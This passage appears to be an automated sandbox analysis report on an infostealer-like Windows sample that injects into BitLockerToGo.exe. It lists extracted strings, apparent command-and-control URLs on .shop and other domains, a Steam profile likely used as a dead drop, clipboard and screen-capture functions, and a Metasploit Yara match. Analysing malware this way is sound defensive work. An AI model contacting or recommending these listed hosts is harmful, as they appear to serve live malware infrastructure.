            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.000000000059C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/Z
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiDQ
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiU
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apir
            Source: BitLockerToGo.exe, 00000002.00000003.1646510389.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/z
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://servicebus.windows.net/https://batch.core.windows.net/https://manage.windowsazure.us/https:/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stagedchheiqwo.shop/
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stagedchheiqwo.shop/Yx
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stagedchheiqwo.shop/api
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stamppreewntnq.shop/
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stamppreewntnq.shop/Kx
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stamppreewntnq.shop/ux
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.naC
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900u
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comRequest
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
            Source: BitLockerToGo.exe, 00000002.00000003.1636364105.0000000000607000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
            Source: BitLockerToGo.exe, 00000002.00000003.1636364105.0000000000607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-m
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49712 version: TLS 1.2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00431530
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00431530
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00425380 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00425380

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043681D2_2_0043681D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040CC802_2_0040CC80
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040C69D2_2_0040C69D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041E8502_2_0041E850
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043B0502_2_0043B050
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D0562_2_0042D056
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042285E2_2_0042285E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004088702_2_00408870
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004098102_2_00409810
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004300352_2_00430035
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042E8D72_2_0042E8D7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043E0802_2_0043E080
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004020AD2_2_004020AD
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041F8B72_2_0041F8B7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004361502_2_00436150
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004209702_2_00420970
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004151722_2_00415172
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043F9E02_2_0043F9E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D9EB2_2_0042D9EB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004081902_2_00408190
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043D9AD2_2_0043D9AD
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004211B02_2_004211B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C9B72_2_0042C9B7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00405A402_2_00405A40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00429A492_2_00429A49
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004262062_2_00426206
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042BADA2_2_0042BADA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042A2DC2_2_0042A2DC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004122E62_2_004122E6
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042E2AC2_2_0042E2AC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004203602_2_00420360
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00411B6E2_2_00411B6E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00424B702_2_00424B70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004013302_2_00401330
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00427B302_2_00427B30
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004323DD2_2_004323DD
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004063E02_2_004063E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00407B802_2_00407B80
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040DB902_2_0040DB90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043E3902_2_0043E390
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00425B9D2_2_00425B9D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004223B52_2_004223B5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043DC702_2_0043DC70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00404C202_2_00404C20
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042F4C72_2_0042F4C7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040D4D02_2_0040D4D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00435CD02_2_00435CD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041A4EA2_2_0041A4EA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00433D5E2_2_00433D5E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040F5782_2_0040F578
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040A5002_2_0040A500
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C5212_2_0042C521
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00420D302_2_00420D30
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004315302_2_00431530
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004285352_2_00428535
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043D5DE2_2_0043D5DE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041CDED2_2_0041CDED
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00421DB52_2_00421DB5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042AE2B2_2_0042AE2B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041E6C02_2_0041E6C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043F6F02_2_0043F6F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004306F72_2_004306F7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00406E802_2_00406E80
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00436E822_2_00436E82
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00430EAE2_2_00430EAE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00401FC52_2_00401FC5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00404FD02_2_00404FD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00418FD52_2_00418FD5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00402FE02_2_00402FE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004357E02_2_004357E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042EF892_2_0042EF89
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043DF902_2_0043DF90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004237A02_2_004237A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040A310 appears 59 times
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040AA20 appears 134 times
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1595195957.0000000000707000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeBinary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@11/3
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004365E0 CoCreateInstance,2_2_004365E0
